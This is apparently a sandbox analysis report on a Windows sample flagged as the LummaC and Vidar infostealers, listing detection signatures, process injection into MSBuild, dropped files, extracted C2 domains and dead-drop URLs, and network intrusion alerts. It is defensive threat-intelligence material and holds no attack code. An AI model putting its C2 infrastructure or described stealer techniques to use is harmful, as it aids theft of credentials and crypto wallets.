Edit tour

Windows Analysis Report
1lKbb2hF7fYToopfpmEvlyRN.exe

Overview

General Information

Sample name:	1lKbb2hF7fYToopfpmEvlyRN.exe
Analysis ID:	1483168
MD5:	3472874efe2c665ab11817ce53216d21
SHA1:	6a75e87df5e211ab55e4daa4f5db59552b480c6a
SHA256:	a35e785bcf822d20a6bfb76d4dd3f78ecebaf8147f03ee2ffd8d492ac8cc657f
Tags:	exe
Infos:

Detection

LummaC, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

1lKbb2hF7fYToopfpmEvlyRN.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe" MD5: 3472874EFE2C665AB11817CE53216D21)

MSBuild.exe (PID: 7280 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

DBAAFIDGDA.exe (PID: 7796 cmdline: "C:\ProgramData\DBAAFIDGDA.exe" MD5: 8E5286E3CAA11C78E275892A38F2E772)

MSBuild.exe (PID: 7828 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

DGDBKFBAKF.exe (PID: 7880 cmdline: "C:\ProgramData\DGDBKFBAKF.exe" MD5: 675737D9B22BCFEFE651C11BD47D404C)

MSBuild.exe (PID: 7916 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 8076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 2980 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "callosallsaospz.shop", "outpointsozp.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199743486170", "https://t.me/s41l0"], "Botnet": "b607a7a47e1a6ff266af835d50c6eaa5"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\ProgramData\DGDBKFBAKF.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\jen1hg[1].exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\ProgramData\DBAAFIDGDA.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gfn1go[1].exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2078508760.000000000418F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000005.00000002.2078508760.0000000004161000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000005.00000002.2078508760.00000000041B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1669807678.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1673284783.0000000004380000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1673284783.0000000004353000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000006.00000002.2617277364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000005.00000002.2075717329.000000000326D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000005.00000002.2078508760.0000000004B1E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x2a7ee:$x5: vchost.exe
00000000.00000002.1673284783.00000000049A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1673284783.0000000004866000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 1lKbb2hF7fYToopfpmEvlyRN.exe PID: 7252	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 1lKbb2hF7fYToopfpmEvlyRN.exe PID: 7252	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 1lKbb2hF7fYToopfpmEvlyRN.exe PID: 7252	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MSBuild.exe PID: 7280	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 7280	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: MSBuild.exe PID: 7280	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: DBAAFIDGDA.exe PID: 7796	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: DBAAFIDGDA.exe PID: 7796	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: DBAAFIDGDA.exe PID: 7796	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MSBuild.exe PID: 7828	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 7828	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: MSBuild.exe PID: 7828	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: DGDBKFBAKF.exe PID: 7880	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.DBAAFIDGDA.exe.4c06f40.5.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
5.2.DBAAFIDGDA.exe.4c06f40.5.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
5.2.DBAAFIDGDA.exe.4165990.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
6.2.MSBuild.exe.400000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.MSBuild.exe.400000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
6.2.MSBuild.exe.400000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
5.2.DBAAFIDGDA.exe.4165990.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.49a3090.9.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
5.2.DBAAFIDGDA.exe.41b99f0.8.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.43531c0.8.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.4975860.6.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.MSBuild.exe.428038.0.raw.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x27b6:$x5: vchost.exe
5.2.DBAAFIDGDA.exe.41b99f0.8.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.4975860.6.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.43809f0.4.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.MSBuild.exe.400000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.MSBuild.exe.400000.1.raw.unpack	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x2a7ee:$x5: vchost.exe
0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.49a3090.9.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.43531c0.8.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.43809f0.4.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
5.0.DBAAFIDGDA.exe.9a0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.0.DGDBKFBAKF.exe.fd0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Click to see the 17 entries

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 23.199.218.33, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7280, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-26T18:56:52.536920+0200
SID:	2054604
Source Port:	49760
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-26T18:56:53.769976+0200
SID:	2054604
Source Port:	49762
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 65.108.151.108 - Destination IP: 192.168.2.4

Timestamp:	2024-07-26T18:57:37.044435+0200
SID:	2011803
Source Port:	443
Destination Port:	49787
Protocol:	TCP
Classtype:	Executable code was detected

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-26T18:57:00.379251+0200
SID:	2843864
Source Port:	49770
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:44.417959+0200
SID:	2028765
Source Port:	49758
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-26T18:56:57.175236+0200
SID:	2054604
Source Port:	49767
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-26T18:56:55.890606+0200
SID:	2054604
Source Port:	49765
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:20.280627+0200
SID:	2028765
Source Port:	49740
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-26T18:56:55.374358+0200
SID:	2048094
Source Port:	49764
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 65.108.151.108 - Destination IP: 192.168.2.4

Timestamp:	2024-07-26T18:57:32.629147+0200
SID:	2051831
Source Port:	443
Destination Port:	49785
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 65.108.151.108

Timestamp:	2024-07-26T18:57:35.017623+0200
SID:	2028765
Source Port:	49787
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:26.038488+0200
SID:	2028765
Source Port:	49750
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.4

Timestamp:	2024-07-26T18:57:01.455032+0200
SID:	2022930
Source Port:	443
Destination Port:	49771
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:22.457448+0200
SID:	2028765
Source Port:	49743
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer Domain in DNS Lookup (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-07-26T18:56:51.977256+0200
SID:	2054593
Source Port:	54843
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:21.739203+0200
SID:	2028765
Source Port:	49742
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:30.595698+0200
SID:	2028765
Source Port:	49753
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-26T18:56:56.592055+0200
SID:	2048094
Source Port:	49765
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:12.338085+0200
SID:	2028765
Source Port:	49735
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:37.491422+0200
SID:	2028765
Source Port:	49756
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 5.75.212.60 - Destination IP: 192.168.2.4

Timestamp:	2024-07-26T18:56:13.006441+0200
SID:	2051831
Source Port:	443
Destination Port:	49735
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:19.249685+0200
SID:	2028765
Source Port:	49739
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-26T18:57:00.351636+0200
SID:	2054604
Source Port:	49770
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 65.108.151.108

Timestamp:	2024-07-26T18:57:28.969307+0200
SID:	2028765
Source Port:	49783
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 65.108.151.108 - Destination IP: 192.168.2.4

Timestamp:	2024-07-26T18:57:31.171758+0200
SID:	2044247
Source Port:	443
Destination Port:	49784
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:58.902651+0200
SID:	2028765
Source Port:	49769
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:53.536905+0200
SID:	2028765
Source Port:	49761
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:52.013021+0200
SID:	2028765
Source Port:	49759
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:11.009544+0200
SID:	2028765
Source Port:	49734
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-26T18:56:54.881709+0200
SID:	2054604
Source Port:	49764
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:11.676767+0200
SID:	2049087
Source Port:	49734
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.4

Timestamp:	2024-07-26T18:56:22.767321+0200
SID:	2022930
Source Port:	443
Destination Port:	49741
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-26T18:57:04.582395+0200
SID:	2054653
Source Port:	49773
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 65.108.151.108

Timestamp:	2024-07-26T18:57:38.356607+0200
SID:	2028765
Source Port:	49788
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:15.155014+0200
SID:	2028765
Source Port:	49737
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 65.108.151.108

Timestamp:	2024-07-26T18:57:33.442894+0200
SID:	2028765
Source Port:	49786
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-26T18:56:54.266851+0200
SID:	2054653
Source Port:	49762
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:54.810885+0200
SID:	2028765
Source Port:	49763
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-26T18:56:58.693631+0200
SID:	2054604
Source Port:	49768
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-26T18:56:53.263672+0200
SID:	2054653
Source Port:	49760
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 65.108.151.108

Timestamp:	2024-07-26T18:57:39.163321+0200
SID:	2028765
Source Port:	49789
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:08.252042+0200
SID:	2028765
Source Port:	49732
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:29.211959+0200
SID:	2028765
Source Port:	49752
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:07.064232+0200
SID:	2028765
Source Port:	49731
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 65.108.151.108

Timestamp:	2024-07-26T18:57:26.272231+0200
SID:	2028765
Source Port:	49781
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:33.853485+0200
SID:	2028765
Source Port:	49754
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 65.108.151.108

Timestamp:	2024-07-26T18:57:31.880500+0200
SID:	2028765
Source Port:	49785
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:09.633690+0200
SID:	2028765
Source Port:	49733
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-26T18:56:59.232158+0200
SID:	2048094
Source Port:	49768
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 5.75.212.60 - Destination IP: 192.168.2.4

Timestamp:	2024-07-26T18:56:17.210237+0200
SID:	2011803
Source Port:	443
Destination Port:	49737
Protocol:	TCP
Classtype:	Executable code was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:27.655634+0200
SID:	2028765
Source Port:	49751
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 65.108.151.108

Timestamp:	2024-07-26T18:57:30.417858+0200
SID:	2028765
Source Port:	49784
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop) - Source IP: 192.168.2.4 - Destination IP: 172.67.213.85

Timestamp:	2024-07-26T18:57:03.549501+0200
SID:	2054604
Source Port:	49773
